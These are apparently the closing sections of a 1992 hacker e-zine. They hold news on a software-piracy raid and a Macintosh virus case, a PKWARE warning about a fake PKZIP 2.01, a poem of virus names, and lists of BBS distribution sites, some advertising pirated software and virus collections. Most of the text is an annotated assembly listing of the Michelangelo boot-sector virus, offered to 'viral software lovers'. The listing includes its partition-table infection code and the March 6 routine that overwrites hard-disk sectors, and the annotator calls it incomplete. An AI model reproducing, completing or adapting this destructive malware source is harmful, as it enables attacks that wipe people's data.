RAM Mobile Data's legal name is RAM Mobile Data USA Limited Partnership
|
|
|
|
------------------------------------------------------------------------------
|
|
|
|
HONEST OFFICER!, HE SAID HE BOUGHT THE STUFF
|
|
|
|
Microsoft and the FBI recently raided four Silicon Valley companies
|
|
seizing bootleg copies of MS-DOS 5.0 and Windows 3.0 as well as associated
|
|
manuals with a street value of more than $180,000. The Tip-off came when
|
|
distributors tried to sell MS-DOS 5.0 seperately.
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
BIG MAC ATTACK FOILED
|
|
|
|
Two Cornell University students have been accused of creating a computer
|
|
virus called MBDF-A, that infected computers around the world.
|
|
David Blumenthal,20 and Mark Pilgrim,19 face a maximum four years in prison
|
|
for allegedly hiding the virus in three Macintosh computer games that were
|
|
sent via modem from Cornell's computer center to an archive at Stanford.
|
|
Macintosh PC's across the USA,Great Britain,and Japan were infected when
|
|
users downloaded the games. Once in the Macs the virus destroyed the operating
|
|
system.
|
|
The two were arrested on misdemeanor charges which have been increased to
|
|
felonies because the virus may have caused more than $1,000 in Damage.
|
|
|
|
-------------------------------------------------------------------------------
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
Section [8]: FOR THE PEOPLE
|
|
Files Collected from BBS's Across the country
|
|
By You the Computer User!
|
|
Edited By: Mercenary
|
|
|
|
-------------------------------------------------------------------------------
|
|
IIRG NOTE: This source code file was floating around for some time
|
|
we provide it here for the programmer or viral software lover.
|
|
-------------------------------------------------------------------------------
|
|
;
|
|
;
|
|
; Michelangelo
|
|
; Size: 512
|
|
; Type: Boot infector
|
|
; Date of action: March 6th
|
|
;
|
|
;
|
|
|
|
data_1e equ 4Ch ; (0000:004C=1DB1h)
|
|
data_2e equ 4Eh ; (0000:004E=70h)
|
|
data_3e equ 413h ; (0000:0413=280h)
|
|
data_4e equ 7C05h ; (0000:7C05=203Ch)
|
|
data_5e equ 7C0Ah ; (0000:7C0A=49EBh)
|
|
data_6e equ 7C0Ch ; (0000:7C0C=2A3Ch)
|
|
data_7e equ 7 ; (694E:0007=0)
|
|
data_8e equ 8 ; (694E:0008=0)
|
|
data_9e equ 0Ah ; (694E:000A=0)
|
|
data_11e equ 7C03h ; (694E:7C03=0)
|
|
|
|
seg_a segment
|
|
assume cs:seg_a, ds:seg_a
|
|
|
|
|
|
org 100h
|
|
|
|
mich proc far
|
|
|
|
start:
|
|
jmp loc_6 ; (01AF) "This is what you see at sector 0"
|
|
db 0F5h, 0, 80h, 9Fh, 2, 3 ; A lot of the virus is hidden
|
|
db 0, 56h, 2, 0, 0C8h, 1Eh ; in these defined bytes
|
|
db 50h, 0Ah, 0D2h, 75h, 1Bh, 33h ; watch this carefully
|
|
db 0C0h, 8Eh, 0D8h, 0F6h, 6, 3Fh ; or you will miss where
|
|
db 4, 1, 75h, 10h, 58h, 1Fh ; it writes to your
|
|
db 9Ch, 2Eh, 0FFh, 1Eh, 0Ah, 0 ; partiton table
|
|
db 9Ch, 0E8h, 0Bh, 0, 9Dh, 0CAh
|
|
db 2, 0, 58h, 1Fh, 2Eh, 0FFh
|
|
db 2Eh, 0Ah, 0, 50h, 53h, 51h
|
|
db 52h, 1Eh, 6, 56h, 57h, 0Eh
|
|
db 1Fh, 0Eh, 7, 0BEh, 4, 0
|
|
loc_1: ;Init registers
|
|
mov ax,201h
|
|
mov bx,200h
|
|
mov cx,1
|
|
xor dx,dx ; Zero register
|
|
pushf ; Push flags
|
|
call dword ptr ds:data_9e; (694E:000A=0)
|
|
jnc loc_2 ; Jump if carry=0
|
|
xor ax,ax ; Zero register
|
|
pushf ; Push flags
|
|
call dword ptr ds:data_9e; (694E:000A=0)
|
|
dec si
|
|
jnz loc_1 ; Jump if not zero
|
|
jmp short loc_5 ; (01A6)
|
|
loc_2: ;Zero registers clear direction
|
|
xor si,si ; Zero register
|
|
cld ; Clear direction
|
|
lodsw ; String [si] to ax
|
|
cmp ax,[bx]
|
|
jne loc_3 ; Jump if not equal
|
|
lodsw ; String [si] to ax
|
|
cmp ax,[bx+2]
|
|
je loc_5 ; Jump if equal
|
|
loc_3: ; cmp byte ptr See infected
|
|
mov ax,301h
|
|
mov dh,1
|
|
mov cl,3
|
|
cmp byte ptr [bx+15h],0FDh
|
|
je loc_4 ; Jump if equal
|
|
mov cl,0Eh
|
|
loc_4: ;call out all db hiden data
|
|
mov ds:data_8e,cx ; (694E:0008=0)
|
|
pushf ; Push flags
|
|
call dword ptr ds:data_9e; (694E:000A=0)
|
|
jc loc_5 ; Jump if carry Set
|
|
mov si,3BEh
|
|
mov di,1BEh
|
|
mov cx,21h
|
|
cld ; Clear direction
|
|
rep movsw ; Rep while cx>0 Mov [si]
|
|
mov ax,301h ; to es:[di]
|
|
xor bx,bx ; Zero register
|
|
mov cx,1
|
|
xor dx,dx ; Zero register
|
|
pushf ; Push flags
|
|
call dword ptr ds:data_9e; (694E:000A=0)
|
|
loc_5: ;Clear all set
|
|
pop di
|
|
pop si
|
|
pop es
|
|
pop ds
|
|
pop dx
|
|
pop cx
|
|
pop bx
|
|
pop ax
|
|
retn
|
|
loc_6: ;Load all hiden data
|
|
xor ax,ax ; Zero register
|
|
mov ds,ax
|
|
cli ; Disable interrupts
|
|
mov ss,ax
|
|
mov ax,7C00h
|
|
mov sp,ax
|
|
sti ; Enable interrupts
|
|
push ds
|
|
push ax
|
|
mov ax,ds:data_1e ; (0000:004C=1DB1h)
|
|
mov ds:data_5e,ax ; (0000:7C0A=49EBh)
|
|
mov ax,ds:data_2e ; (0000:004E=70h)
|
|
mov ds:data_6e,ax ; (0000:7C0C=2A3Ch)
|
|
mov ax,ds:data_3e ; (0000:0413=280h)
|
|
dec ax
|
|
dec ax
|
|
mov ds:data_3e,ax ; (0000:0413=280h)
|
|
mov cl,6
|
|
shl ax,cl ; Shift w/zeros fill
|
|
mov es,ax
|
|
mov ds:data_4e,ax ; (0000:7C05=203Ch)
|
|
mov ax,0Eh
|
|
mov ds:data_1e,ax ; (0000:004C=1DB1h)
|
|
mov ds:data_2e,es ; (0000:004E=70h)
|
|
mov cx,1BEh
|
|
mov si,7C00h
|
|
xor di,di ; Zero register
|
|
cld ; Clear direction
|
|
rep movsb ; Rep while cx>0 Mov [si]
|
|
jmp dword ptr cs:data_11e; to es:[di] (694E:7C03=0)
|
|
db 33h, 0C0h, 8Eh, 0C0h, 0CDh, 13h ;<- Notice all the
|
|
db 0Eh, 1Fh, 0B8h, 1, 2, 0BBh ; cd 13
|
|
db 0, 7Ch, 8Bh, 0Eh, 8, 0
|
|
db 83h, 0F9h, 7, 75h, 7, 0BAh
|
|
db 80h, 0, 0CDh, 13h, 0EBh, 2Bh
|
|
db 8Bh, 0Eh, 8, 0, 0BAh, 0
|
|
db 1, 0CDh, 13h, 72h, 20h, 0Eh
|
|
db 7, 0B8h, 1, 2, 0BBh, 0
|
|
db 2, 0B9h, 1, 0, 0BAh, 80h
|
|
db 0, 0CDh, 13h, 72h, 0Eh, 33h
|
|
db 0F6h, 0FCh, 0ADh, 3Bh, 7, 75h
|
|
db 4Fh, 0ADh, 3Bh, 47h, 2
|
|
db 75h, 49h
|
|
loc_7:;check if it is time to nuke
|
|
xor cx,cx ; Zero register
|
|
mov ah,4
|
|
int 1Ah ; Real time clock ah=func 04h don't work on an xt
|
|
; read date cx=year, dx=mon/day
|
|
cmp dx,306h ; See if March 6th
|
|
je loc_8 ; Jump if equal to nuking subs
|
|
retf ; Return to launch command.com
|
|
loc_8:;get ready
|
|
xor dx,dx ; Zero register
|
|
mov cx,1
|
|
loc_9:;run 7 times nuke 31.5 megs of hd
|
|
mov ax,309h
|
|
mov si,ds:data_8e ; (694E:0008=0)
|
|
cmp si,3
|
|
je loc_10 ; Jump if equal
|
|
mov al,0Eh
|
|
cmp si,0Eh
|
|
je loc_10 ; Jump if equal
|
|
mov dl,80h
|
|
mov byte ptr ds:data_7e,4; (694E:0007=0)
|
|
mov al,11h
|
|
loc_10: ;nuke away
|
|
mov bx,5000h
|
|
mov es,bx
|
|
int 13h ; Disk dl=drive a: ah=func 03h
|
|
; write sectors from mem es:bx
|
|
jnc loc_11 ; Jump if carry=0
|
|
xor ah,ah ; Zero register
|
|
int 13h ; Disk dl=drive a: ah=func 00h
|
|
; reset disk, al=return status
|
|
loc_11: ;rest for loc-9 nuking
|
|
inc dh
|
|
cmp dh,ds:data_7e ; (694E:0007=0)
|
|
jb loc_9 ; Jump if below
|
|
xor dh,dh ; Zero register
|
|
inc ch
|
|
jmp short loc_9 ; (0250)
|
|
loc_12:;time to infect a floppie or hard dirve
|
|
mov cx,7
|
|
mov ds:data_8e,cx ; (694E:0008=0)
|
|
mov ax,301h
|
|
mov dx,80h
|
|
int 13h ; Disk dl=drive a: ah=func 03h infect flopie
|
|
; write sectors from mem es:bx
|
|
jc loc_7 ; Jump if carry Set
|
|
mov si,3BEh
|
|
mov di,1BEh
|
|
mov cx,21h
|
|
rep movsw ; Rep while cx>0 Mov [si]
|
|
mov ax,301h : to es:[di]
|
|
xor bx,bx ; Zero register
|
|
inc cl
|
|
int 13h ; Disk dl=drive a: ah=func 03h lets infect hd
|
|
; write sectors from mem es:bx
|
|
;* jmp short loc_13 ;*(02E0)
|
|
db 0EBh, 32h
|
|
db 1, 4, 11h, 0, 80h, 0
|
|
db 5, 5, 32h, 1, 0, 0
|
|
db 0, 0, 0
|
|
db 53h, 53h, 20h, 20h, 43h, 4Fh
|
|
db 4Dh
|
|
db 58 dup (0)
|
|
db 55h, 0AAh
|
|
|
|
seg_a ends
|
|
|
|
;Last notes this virus looks like a poor hack job on the stoned virus.
|
|
;It is kinda cool in the fact that it is hard to get out of the partition table
|
|
;even if you nuke the partition table it will live on even if you replace it.
|
|
;the only way to get it out of the partition table is 1. debug 2.clean ver 86b
|
|
;3 cpav 1.0 and above. oh yeah and all that special shit that came out for it
|
|
;this virus uses int 1ah which doesn't work on an XT system.
|
|
;the virus isn't actually 512 but that is how much it writes.
|
|
;it moves the boot area of a floppy to the last sector on the disk
|
|
;and on a harddrive it moves it to the last sector in the root directory
|
|
;This should show you all how much the media can over do it on things
|
|
;since this is really a lame virus, to tell you the truth there is a lot better
|
|
;ones out there.
|
|
;This in no way is a complete listing of the code for the virus.
|
|
;Nor is it the best since i'm not the best at Assembly.
|
|
;Done by Visionary.
|
|
;BTW to who ever wrote this virus... Get a life!
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
03/16/1992
|
|
|
|
WARNING! WARNING! WARNING! WARNING! WARNING! WARNING! WARNING!
|
|
--------------------------------------------------------------------
|
|
|
|
There is a file being circulated on BBS's called PKZ201.ZIP or
|
|
PKZ201.EXE or similar, and that claims to be version 2.01 of
|
|
PKZIP but in fact is a hacked version of PKZIP 1.93 Alpha.
|
|
|
|
As of the date of this writing, the latest version of PKZIP is
|
|
version 1.10.
|
|
|
|
If you see the files PKZ201.ZIP or PKZ201.EXE on any BBS or
|
|
on-line system, please ask the SysOp of that system to remove
|
|
the files IMMEDIATELY, and please contact PKWARE to report
|
|
where the files were seen.
|
|
|
|
Of course, because of this PKWARE will never release a version
|
|
of PKZIP with the version number 2.01.
|
|
|
|
If you have any information about the source of PKZ201.EXE or
|
|
PKZ201.ZIP, please report it to PKWARE immediately, either:
|
|
|
|
by Voice at 414-354-8699
|
|
by BBS at 414-354-8670
|
|
by FAX at 414-354-8559
|
|
or by mail:
|
|
|
|
PKWARE Inc.
|
|
9025 N. Deerwood Drive
|
|
Brown Deer, WI 53223 USA
|
|
|
|
|
|
Sincerely,
|
|
|
|
|
|
Phil Katz
|
|
President, PKWARE Inc.
|
|
-------------------------------------------------------------------------------
|
|
|
|
A VIRUS POEM
|
|
By: Brooks Hilliard
|
|
|
|
There's Beta and Manta,Get Password and CB
|
|
Amstrad and Leningrad,F-Word and BeBe
|
|
Haifa,Messina,Enigma,Gergana
|
|
Tequila,Azuza and Nina,Vienna.
|
|
There's Smily and Shirly,Israeli and Anthrax
|
|
and Yankee and Miky,Raubkopi,Oropax.
|
|
There's Newcom and Checksum and Boojum and Prism
|
|
and Incom and Phantom and Planinum and Skism.
|
|
There's Scrambler and Squeaker and Joker,Disk Killer,
|
|
Filler Despoiler and Green Caterpillar.
|
|
Theres Jojo,Ohio and Spanish April Fool,
|
|
Frodo and Turbo,Jerusalem Mule.
|
|
There's Sadist and Chemist and Cinderella.
|
|
Burger and Ogre and Finger and Kalah.
|
|
Azusa,Eliza,Zargosa and Sotcha,
|
|
Macedonia,Albania,Necrophilia and Gotcha.
|
|
Theres Palette and Merritt, and Friday the 13th
|
|
and Saddam and Virdem and Saturday 14th.
|
|
There's Typo,Empire,and Topo,and Ping Pong,
|
|
Mosquito,and Fire,and Psycho,and Lao Doung.
|
|
Theres USSR and Ambulance Car,
|
|
And Wonder,Surrender and Redstar and Spar
|
|
Bugares,Vorohezh,Xabaras,and Flash
|
|
Microbes and Irish,Addidas and Crash.
|
|
There's Timid,New Zealand,Bloody! and Tiny DI.
|
|
There's Stupid and Lovechild and Froggie and Lehigh.
|
|
There's Stoned and Scotts Valley and Happy N.Y.
|
|
There's Cascade,Black Wizard and also Bad Guy.
|
|
There's Frere Jacques,Maraudar,Invader,
|
|
Vacsina Rybka and also Darth Vader.
|
|
There's Barcelona and Nomenkla-tara,
|
|
and then Montezuma and Hydra and Cara.
|
|
There's Music,Icelandic,Generic and Whale,
|
|
There's Lisbon and Pentagon and Phalcon and Yale.
|
|
Pirate and Mutant and Fumble and Hello
|
|
There's Patient and Advent and Michelangelo.
|
|
That's 130 viruses,smaller and greater
|
|
If you don't get protected,You'll lose all your data.
|
|
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
Section [9]: IIRG Distribution Sites
|
|
|
|
|
|
|
|
|
|
////// ////// /////// ////////
|
|
// // // // //
|
|
// // /////// // ////
|
|
// // // // // //
|
|
////// * ////// * // // * /////////
|
|
|
|
|
|
|
|
|
|
IIRG World HQ: Dark Shadows
|
|
19.2/9600 Baud HST
|
|
24 Hours a Day
|
|
1.2 Gigs Online
|
|
(203)-628-9660
|
|
|
|
|
|
IIRG Distribution Site 1: Restaurant at the End of the Universe
|
|
2400/1200 Baud (3 Nodes!!)
|
|
24 hours a day
|
|
130 Megs of Files
|
|
(203)567-8903 2 Nodes 2400
|
|
(203)567-4808 1 Node 1200
|
|
|
|
IIRG Distribution Site 2: The Generic Access BBS
|
|
INC New England Regional District HQs
|
|
IUD New England Regional District HQs
|
|
1.2 gigs online
|
|
USR Dual Standard HST
|
|
NO Ratios
|
|
(508) 281-3961
|
|
|
|
IIRG Distribution Site 3: The Sanitarium
|
|
Sysops: Morbid Angel [INC/ACID]
|
|
Spectral Illusion [ACID/RAZOR]
|
|
IIRG Distribution Site
|
|
ACID Member Board
|
|
INC Courier Board
|
|
RAZOR 1911 Courier Board
|
|
VISA World Headquarters
|
|
(817)PRI-VATE
|
|
|
|
|
|
IIRG Distribution Site 4: CTHH 666
|
|
2400 - 57.6 Baud
|
|
Sysop: Beelzebub
|
|
HAU AB! East Coast Headquarters
|
|
Hackers Alliance Of The Underground Abuse
|
|
I.I.R.G. Distribution Site
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
Section [9]: Phantasy Distribution Sites
|
|
|
|
Phantasy's Distribution Site's are continually growing, we apologize if you
|
|
called a board and didn't find the Mag. Network Distribution Sites will
|
|
have the Issues first, we suggest calling one of them if a problem does
|
|
arise.
|
|
|
|
|
|
1. Lightning Systems
|
|
(414) 363-4282
|
|
Sixty Million Bytes OnLine
|
|
USRobotics Dual Standard HST/V.32bis
|
|
2400 thru 14.4k v.32bis/HST
|
|
|
|
2. Sycamore Elite
|
|
19,200-1200 Baud HST, 24 Hours a day
|
|
(815) 895-5573
|
|
|
|
3. The Works BBS at (617-861-8976)
|
|
Largest Text Files BBS in the world, 3500+ text files online.
|
|
2400-300 Baud, 24 Hours a day
|
|
|
|
4. Pipers Pit BBS
|
|
19,200-9600 HST ONLY!!
|
|
24 Hours a Day
|
|
THG Distro Site 1300 Megs
|
|
(203)PRI-VATE [2 Nodes]
|
|
|
|
5. Blitzkrieg BBS TAP Magazine
|
|
(502)-499-8933 P.O. BOX 20264
|
|
Home of TAP MAgazine Louisville,KY. 40250-0264
|
|
|
|
6. The Dickinson Nightlight
|
|
(713)-337-1452
|
|
Der WeltanSchauung Distro Site (World View Magazine)
|
|
Phantasy Distro Site
|
|
|
|
7. Lucid Dreams
|
|
SysOp: Louis Cypher Number: (713)522-0709
|
|
Running: Flashback Speed: USR DS 38.4
|
|
0-1 Day Warez 1400 T-Files
|
|
300+ Virii Net: TcH
|
|
|
|
|
|
PHANTASY is also available on:
|
|
|
|
1. RIPCO BBS (312)528-5020
|
|
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
PHANTASY(C) IIRG 1991,1992
|
|
May Odin Guide Your Way!
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
|